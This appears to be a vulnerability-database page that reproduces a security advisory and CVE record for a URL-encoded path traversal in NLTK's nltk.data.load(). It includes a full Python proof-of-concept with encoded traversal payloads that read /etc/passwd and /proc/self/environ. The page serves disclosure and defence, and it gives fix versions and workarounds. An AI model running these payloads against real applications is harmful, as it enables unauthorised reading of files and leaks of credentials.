Vulnerability-Lookup

GHSA-P4GQ-832X-FM9V

Vulnerability from github – Published: 2026-06-16 14:34 – Updated: 2026-06-16 14:34

Summary

Natural Language Toolkit (NLTK): URL-Encoded Path Traversal in nltk.data.load() Allows Arbitrary Local File Read

Details

Summary

nltk.data.load() in NLTK is vulnerable to path traversal via URL-encoded path separators and traversal segments when using the nltk: URL scheme. The unsafe-path regex check is performed before url2pathname() decodes the %xx sequences (a classic decode-after-check / TOCTOU-style flaw), allowing an attacker to bypass the protection documented in NLTK's SECURITY.md and read arbitrary files from the filesystem. While literal traversal strings such as ../../../etc/passwd are correctly blocked, encoded variants such as %2fetc%2fpasswd, %2e%2e%2f..., and ..%2f..%2f slip past the regex and are subsequently decoded into a real filesystem path.

Affected Component

nltk/data.py — find(), normalize_resource_url(), and the _UNSAFE_NO_PROTOCOL_RE regex check. Relevant occurrences:

data.py L650–L653 — final path constructed from url2pathname(resource_name) after checks data.py L54–L69 — _UNSAFE_NO_PROTOCOL_RE operates only on the undecoded string data.py L219–L245 — normalize_resource_url() for nltk: scheme contributes to decode-after-check data.py L615–L618 — defense-in-depth traversal check also operates on undecoded input

Root Cause The regex _UNSAFE_NO_PROTOCOL_RE is matched against the raw resource string. Path normalization via url2pathname() happens later, so any percent-encoded / (%2f) or . (%2e) is invisible to the regex but becomes active in the final path.

Proof of Concept

"""
NLTK Arbitrary File Read via URL-Encoded Path Traversal
=======================================================
Bypasses _UNSAFE_NO_PROTOCOL_RE security regex in nltk/data.py
by URL-encoding path separators and traversal components.

Affected: NLTK <= 3.9.4 (default ENFORCE=False configuration)
CWE: CWE-22 (Path Traversal)

Root Cause:
  nltk/data.py:find() checks resource names against a regex for
  traversal patterns (../, leading /, etc.) BEFORE calling
  url2pathname() which decodes %xx sequences. This is a classic
  "decode-after-check" vulnerability.
"""

import sys
import os
import warnings

# Suppress NLTK security warnings for clean PoC output
warnings.filterwarnings("ignore", category=RuntimeWarning)

# Setup
sys.path.insert(0, os.path.join(os.path.dirname(__file__), "nltk"))
os.makedirs(os.path.expanduser("~/nltk_data/corpora"), exist_ok=True)

import nltk
from nltk.pathsec import ENFORCE

BANNER = """
===================================================
 NLTK URL-Encoded Path Traversal PoC
 Affected: nltk <= 3.9.4
 Default ENFORCE={enforce}
===================================================
""".format(enforce=ENFORCE)

def test_variant(name, payload, fmt="raw"):
    """Test a single traversal variant."""
    try:
        content = nltk.data.load(payload, format=fmt)
        if isinstance(content, bytes):
            preview = content[:200].decode("utf-8", errors="replace")
        else:
            preview = content[:200]
        first_line = preview.split("\n")[0]
        print(f"  [VULN] {name}")
        print(f"         Payload: {payload}")
        print(f"         Read OK: {first_line}")
        return True
    except Exception as e:
        print(f"  [SAFE] {name}")
        print(f"         Payload: {payload}")
        print(f"         Blocked: {type(e).__name__}: {e}")
        return False


def main():
    print(BANNER)
    vulns = 0

    # --- Variant 1: URL-encoded absolute path ---
    print("[1] URL-encoded absolute path (%2f = /)")
    if test_variant(
        "Encoded leading slash bypasses ^/ regex check",
        "nltk:%2fetc%2fpasswd",
    ):
        vulns += 1

    print()

    # --- Variant 2: Encoded dot-dot traversal ---
    print("[2] URL-encoded dot-dot traversal (%2e = .)")
    if test_variant(
        "Encoded dots bypass \\.\\./ regex check",
        "nltk:corpora/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
    ):
        vulns += 1

    print()

    # --- Variant 3: Literal dots with encoded slash ---
    print("[3] Literal dots with encoded slash (..%2f)")
    if test_variant(
        "Encoded slash after literal .. bypasses \\.\\./ regex",
        "nltk:corpora/..%2f..%2f..%2f..%2f..%2fetc%2fpasswd",
    ):
        vulns += 1

    print()

    # --- Variant 4: Read process environment (credential leak) ---
    print("[4] Read /proc/self/environ (credential leakage)")
    try:
        content = nltk.data.load("nltk:%2fproc%2fself%2fenviron", format="raw")
        env_vars = content.decode("utf-8", errors="replace").split("\x00")
        print(f"  [VULN] Leaked {len(env_vars)} environment variables")
        for var in env_vars[:3]:
            if var:
                key = var.split("=")[0] if "=" in var else var
                print(f"         {key}=...")
        vulns += 1
    except Exception as e:
        print(f"  [SAFE] Blocked: {e}")

    print()

    # --- Control: verify normal traversal IS blocked ---
    print("[CONTROL] Verify literal ../ is blocked by regex")
    test_variant("Direct traversal (should be blocked)", "nltk:../../../etc/passwd")

    print()
    print("=" * 51)
    print(f" Result: {vulns} bypass variant(s) succeeded")
    if vulns > 0:
        print(" Status: VULNERABLE (url2pathname decodes after regex check)")
    else:
        print(" Status: Not vulnerable")
    print("=" * 51)


if __name__ == "__main__":
    main()

Impact

Arbitrary local file read whenever attacker-controlled input reaches nltk.data.load(). Realistic targets include:

/etc/passwd, /etc/shadow (if readable) /proc/self/environ — leaks environment variables, often containing API keys, DB credentials, cloud secrets Application source code and configuration files Cloud metadata, deployment secrets, SSH keys

This is directly relevant to web applications, hosted notebook services, multi-tenant ML pipelines, and CI/CD systems that pass untrusted resource identifiers into NLTK. NLTK's SECURITY.md explicitly places path traversal within the scope of its protection model, so this is a documented security boundary being broken.

Severity

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "nltk"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "3.9.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-54293"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-16T14:34:15Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\nnltk.data.load() in NLTK is vulnerable to path traversal via URL-encoded path separators and traversal segments when using the nltk: URL scheme. The unsafe-path regex check is performed before url2pathname() decodes the %xx sequences (a classic decode-after-check / TOCTOU-style flaw), allowing an attacker to bypass the protection documented in NLTK\u0027s SECURITY.md and read arbitrary files from the filesystem.\nWhile literal traversal strings such as ../../../etc/passwd are correctly blocked, encoded variants such as %2fetc%2fpasswd, %2e%2e%2f..., and ..%2f..%2f slip past the regex and are subsequently decoded into a real filesystem path.\n### Affected Component\nnltk/data.py \u2014 find(), normalize_resource_url(), and the _UNSAFE_NO_PROTOCOL_RE regex check.\nRelevant occurrences:\n\ndata.py L650\u2013L653 \u2014 final path constructed from url2pathname(resource_name) after checks\ndata.py L54\u2013L69 \u2014 _UNSAFE_NO_PROTOCOL_RE operates only on the undecoded string\ndata.py L219\u2013L245 \u2014 normalize_resource_url() for nltk: scheme contributes to decode-after-check\ndata.py L615\u2013L618 \u2014 defense-in-depth traversal check also operates on undecoded input\n\nRoot Cause\nThe regex _UNSAFE_NO_PROTOCOL_RE is matched against the raw resource string. Path normalization via url2pathname() happens later, so any percent-encoded / (%2f) or . (%2e) is invisible to the regex but becomes active in the final path.\n### Proof of Concept\n```\n\"\"\"\nNLTK Arbitrary File Read via URL-Encoded Path Traversal\n=======================================================\nBypasses _UNSAFE_NO_PROTOCOL_RE security regex in nltk/data.py\nby URL-encoding path separators and traversal components.\n\nAffected: NLTK \u003c= 3.9.4 (default ENFORCE=False configuration)\nCWE: CWE-22 (Path Traversal)\n\nRoot Cause:\n  nltk/data.py:find() checks resource names against a regex for\n  traversal patterns (../, leading /, etc.) BEFORE calling\n  url2pathname() which decodes %xx sequences. This is a classic\n  \"decode-after-check\" vulnerability.\n\"\"\"\n\nimport sys\nimport os\nimport warnings\n\n# Suppress NLTK security warnings for clean PoC output\nwarnings.filterwarnings(\"ignore\", category=RuntimeWarning)\n\n# Setup\nsys.path.insert(0, os.path.join(os.path.dirname(__file__), \"nltk\"))\nos.makedirs(os.path.expanduser(\"~/nltk_data/corpora\"), exist_ok=True)\n\nimport nltk\nfrom nltk.pathsec import ENFORCE\n\nBANNER = \"\"\"\n===================================================\n NLTK URL-Encoded Path Traversal PoC\n Affected: nltk \u003c= 3.9.4\n Default ENFORCE={enforce}\n===================================================\n\"\"\".format(enforce=ENFORCE)\n\ndef test_variant(name, payload, fmt=\"raw\"):\n    \"\"\"Test a single traversal variant.\"\"\"\n    try:\n        content = nltk.data.load(payload, format=fmt)\n        if isinstance(content, bytes):\n            preview = content[:200].decode(\"utf-8\", errors=\"replace\")\n        else:\n            preview = content[:200]\n        first_line = preview.split(\"\\n\")[0]\n        print(f\"  [VULN] {name}\")\n        print(f\"         Payload: {payload}\")\n        print(f\"         Read OK: {first_line}\")\n        return True\n    except Exception as e:\n        print(f\"  [SAFE] {name}\")\n        print(f\"         Payload: {payload}\")\n        print(f\"         Blocked: {type(e).__name__}: {e}\")\n        return False\n\n\ndef main():\n    print(BANNER)\n    vulns = 0\n\n    # --- Variant 1: URL-encoded absolute path ---\n    print(\"[1] URL-encoded absolute path (%2f = /)\")\n    if test_variant(\n        \"Encoded leading slash bypasses ^/ regex check\",\n        \"nltk:%2fetc%2fpasswd\",\n    ):\n        vulns += 1\n\n    print()\n\n    # --- Variant 2: Encoded dot-dot traversal ---\n    print(\"[2] URL-encoded dot-dot traversal (%2e = .)\")\n    if test_variant(\n        \"Encoded dots bypass \\\\.\\\\./ regex check\",\n        \"nltk:corpora/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd\",\n    ):\n        vulns += 1\n\n    print()\n\n    # --- Variant 3: Literal dots with encoded slash ---\n    print(\"[3] Literal dots with encoded slash (..%2f)\")\n    if test_variant(\n        \"Encoded slash after literal .. bypasses \\\\.\\\\./ regex\",\n        \"nltk:corpora/..%2f..%2f..%2f..%2f..%2fetc%2fpasswd\",\n    ):\n        vulns += 1\n\n    print()\n\n    # --- Variant 4: Read process environment (credential leak) ---\n    print(\"[4] Read /proc/self/environ (credential leakage)\")\n    try:\n        content = nltk.data.load(\"nltk:%2fproc%2fself%2fenviron\", format=\"raw\")\n        env_vars = content.decode(\"utf-8\", errors=\"replace\").split(\"\\x00\")\n        print(f\"  [VULN] Leaked {len(env_vars)} environment variables\")\n        for var in env_vars[:3]:\n            if var:\n                key = var.split(\"=\")[0] if \"=\" in var else var\n                print(f\"         {key}=...\")\n        vulns += 1\n    except Exception as e:\n        print(f\"  [SAFE] Blocked: {e}\")\n\n    print()\n\n    # --- Control: verify normal traversal IS blocked ---\n    print(\"[CONTROL] Verify literal ../ is blocked by regex\")\n    test_variant(\"Direct traversal (should be blocked)\", \"nltk:../../../etc/passwd\")\n\n    print()\n    print(\"=\" * 51)\n    print(f\" Result: {vulns} bypass variant(s) succeeded\")\n    if vulns \u003e 0:\n        print(\" Status: VULNERABLE (url2pathname decodes after regex check)\")\n    else:\n        print(\" Status: Not vulnerable\")\n    print(\"=\" * 51)\n\n\nif __name__ == \"__main__\":\n    main()\n```\n### Impact\nArbitrary local file read whenever attacker-controlled input reaches nltk.data.load(). Realistic targets include:\n\n/etc/passwd, /etc/shadow (if readable)\n/proc/self/environ \u2014 leaks environment variables, often containing API keys, DB credentials, cloud secrets\nApplication source code and configuration files\nCloud metadata, deployment secrets, SSH keys\n\nThis is directly relevant to web applications, hosted notebook services, multi-tenant ML pipelines, and CI/CD systems that pass untrusted resource identifiers into NLTK. NLTK\u0027s SECURITY.md explicitly places path traversal within the scope of its protection model, so this is a documented security boundary being broken.",
  "id": "GHSA-p4gq-832x-fm9v",
  "modified": "2026-06-16T14:34:15Z",
  "published": "2026-06-16T14:34:15Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nltk/nltk/security/advisories/GHSA-p4gq-832x-fm9v"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nltk/nltk"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Natural Language Toolkit (NLTK): URL-Encoded Path Traversal in nltk.data.load() Allows Arbitrary Local File Read"
}

CVE-2026-54293 (GCVE-0-2026-54293)

Vulnerability from cvelistv5 – Published: 2026-06-22 17:25 – Updated: 2026-07-02 12:05

Title

NLTK: URL-Encoded Path Traversal in nltk.data.load() Allows Arbitrary Local File Read

Summary

NLTK (Natural Language Toolkit) is a suite of open source Python modules, data sets, and tutorials supporting research and development in Natural Language Processing. Prior to 3.10.0-rc1, nltk.data.load() in NLTK is vulnerable to path traversal via URL-encoded path separators and traversal segments when using the nltk: URL scheme. The unsafe-path regex check is performed before url2pathname() decodes the %xx sequences (a classic decode-after-check / TOCTOU-style flaw), allowing an attacker to bypass the protection documented in NLTK's SECURITY.md and read arbitrary files from the filesystem. While literal traversal strings such as ../../../etc/passwd are correctly blocked, encoded variants such as %2fetc%2fpasswd, %2e%2e%2f..., and ..%2f..%2f slip past the regex and are subsequently decoded into a real filesystem path. This vulnerability is fixed in 3.10.0-rc1.

Severity

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

SSVC

Exploitation: poc Automatable: yes Technical Impact: partial

CISA Coordinator (v2.0.3)

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Assigner

GitHub_M

References

5 references

URL	Tags
https://github.com/nltk/nltk/security/advisories/…	x_refsource_CONFIRM
https://github.com/nltk/nltk/pull/3575	x_refsource_MISC
https://access.redhat.com/security/cve/CVE-2026-54293	vdb-entryx_refsource_REDHAT
https://bugzilla.redhat.com/show_bug.cgi?id=2491486	issue-trackingx_refsource_REDHAT
https://security.access.redhat.com/data/csaf/v2/v…	x_sadp-csaf-vex

Impacted products

5 products

Vendor	Product	Version
nltk	nltk	Affected: < 3.10.0-rc1
Red Hat	Exploit Intelligence	cpe:/a:redhat:exploit_intelligence:0
Red Hat	OpenShift Lightspeed	cpe:/a:redhat:openshift_lightspeed
Red Hat	Red Hat Ansible Automation Platform 2	cpe:/a:redhat:ansible_automation_platform:2
Red Hat	Red Hat OpenShift AI (RHOAI)	cpe:/a:redhat:openshift_ai

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-54293",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-06-22T21:18:34.399949Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-06-22T21:18:59.775Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/nltk/nltk/security/advisories/GHSA-p4gq-832x-fm9v"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      },
      {
        "affected": [
          {
            "cpes": [
              "cpe:/a:redhat:exploit_intelligence:0"
            ],
            "defaultStatus": "affected",
            "product": "Exploit Intelligence",
            "vendor": "Red Hat"
          },
          {
            "cpes": [
              "cpe:/a:redhat:openshift_lightspeed"
            ],
            "defaultStatus": "affected",
            "product": "OpenShift Lightspeed",
            "vendor": "Red Hat"
          },
          {
            "cpes": [
              "cpe:/a:redhat:ansible_automation_platform:2"
            ],
            "defaultStatus": "affected",
            "product": "Red Hat Ansible Automation Platform 2",
            "vendor": "Red Hat"
          },
          {
            "cpes": [
              "cpe:/a:redhat:openshift_ai"
            ],
            "defaultStatus": "affected",
            "product": "Red Hat OpenShift AI (RHOAI)",
            "vendor": "Red Hat"
          }
        ],
        "datePublic": "2026-06-22T17:25:05.611Z",
        "descriptions": [
          {
            "lang": "en",
            "value": "A flaw was found in NLTK (Natural Language Toolkit). The `nltk.data.load()` function is vulnerable to path traversal when processing specially crafted `nltk:` URLs. An attacker can exploit a decode-after-check flaw, where URL-encoded path separators and traversal segments bypass security checks. This allows the attacker to read arbitrary files from the filesystem, leading to information disclosure."
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "namespace": "https://access.redhat.com/security/updates/classification/",
                "value": "Important"
              },
              "type": "Red Hat severity rating"
            }
          },
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "NETWORK",
              "availabilityImpact": "NONE",
              "baseScore": 7.5,
              "baseSeverity": "HIGH",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "NONE",
              "privilegesRequired": "NONE",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
              "version": "3.1"
            },
            "format": "CVSS"
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-22",
                "description": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-07-02T12:05:25.031Z",
          "orgId": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
          "shortName": "redhat-SADP"
        },
        "references": [
          {
            "tags": [
              "vdb-entry",
              "x_refsource_REDHAT"
            ],
            "url": "https://access.redhat.com/security/cve/CVE-2026-54293"
          },
          {
            "name": "RHBZ#2491486",
            "tags": [
              "issue-tracking",
              "x_refsource_REDHAT"
            ],
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2491486"
          },
          {
            "tags": [
              "x_sadp-csaf-vex"
            ],
            "url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-54293.json"
          }
        ],
        "timeline": [
          {
            "lang": "en",
            "time": "2026-06-22T19:01:09.319Z",
            "value": "Reported to Red Hat."
          },
          {
            "lang": "en",
            "time": "2026-06-22T17:25:05.611Z",
            "value": "Made public."
          }
        ],
        "title": "nltk: NLTK: Information Disclosure via Path Traversal in `nltk.data.load()`",
        "workarounds": [
          {
            "lang": "en",
            "value": "Update the nltk package to version 3.10.0 or later when a stable release is available. Upstream has fixed this issue in 3.10.0-rc1.\n\nUntil updated builds are available, do not pass attacker-controlled resource identifiers to nltk.data.load() when using the nltk: URL scheme. Restrict NLTK data loading to trusted, application-controlled paths."
          }
        ],
        "x_adpType": "supplier",
        "x_generator": {
          "engine": "sadp-cli 1.0.0"
        }
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "nltk",
          "vendor": "nltk",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 3.10.0-rc1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "NLTK (Natural Language Toolkit) is a suite of open source Python modules, data sets, and tutorials supporting research and development in Natural Language Processing. Prior to 3.10.0-rc1, nltk.data.load() in NLTK is vulnerable to path traversal via URL-encoded path separators and traversal segments when using the nltk: URL scheme. The unsafe-path regex check is performed before url2pathname() decodes the %xx sequences (a classic decode-after-check / TOCTOU-style flaw), allowing an attacker to bypass the protection documented in NLTK\u0027s SECURITY.md and read arbitrary files from the filesystem. While literal traversal strings such as ../../../etc/passwd are correctly blocked, encoded variants such as %2fetc%2fpasswd, %2e%2e%2f..., and ..%2f..%2f slip past the regex and are subsequently decoded into a real filesystem path. This vulnerability is fixed in 3.10.0-rc1."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-06-22T17:25:05.611Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/nltk/nltk/security/advisories/GHSA-p4gq-832x-fm9v",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/nltk/nltk/security/advisories/GHSA-p4gq-832x-fm9v"
        },
        {
          "name": "https://github.com/nltk/nltk/pull/3575",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/nltk/nltk/pull/3575"
        }
      ],
      "source": {
        "advisory": "GHSA-p4gq-832x-fm9v",
        "discovery": "UNKNOWN"
      },
      "title": "NLTK: URL-Encoded Path Traversal in nltk.data.load() Allows Arbitrary Local File Read"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-54293",
    "datePublished": "2026-06-22T17:25:05.611Z",
    "dateReserved": "2026-06-12T17:46:37.293Z",
    "dateUpdated": "2026-07-02T12:05:25.031Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

GHSA-P4GQ-832X-FM9V

Summary

Affected Component

Proof of Concept

Impact

CVE-2026-54293 (GCVE-0-2026-54293)

Tags

Sightings

Nomenclature